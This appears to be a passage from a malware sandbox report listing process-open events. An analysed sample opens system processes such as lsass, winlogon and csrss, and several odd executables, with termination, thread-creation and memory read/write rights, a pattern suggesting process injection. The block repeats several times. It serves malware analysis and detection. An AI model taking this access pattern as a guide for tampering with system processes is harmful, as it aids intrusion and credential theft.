| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\shirts_cumshots_compaq.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\league.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\js_sound.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\beast-dry.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft synchronization services\forecastsgeographic.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows portable devices\reno.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\specreformwear.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows photo viewer\rr_publications.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\solo.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\beam.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\adobe\configurations.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows sidebar\fact-film-anticipated.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\wanting villages.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\engagementresearchersmonkey.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\surgical-marcus.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\shirts_cumshots_compaq.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\league.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\js_sound.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\beast-dry.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft synchronization services\forecastsgeographic.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows portable devices\reno.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\specreformwear.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows photo viewer\rr_publications.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\solo.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\beam.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\adobe\configurations.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows sidebar\fact-film-anticipated.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\wanting villages.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\engagementresearchersmonkey.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\surgical-marcus.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\shirts_cumshots_compaq.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\league.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\js_sound.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\beast-dry.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft synchronization services\forecastsgeographic.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows portable devices\reno.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\specreformwear.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows photo viewer\rr_publications.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\solo.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\beam.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\adobe\configurations.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows sidebar\fact-film-anticipated.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\wanting villages.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\engagementresearchersmonkey.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\surgical-marcus.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
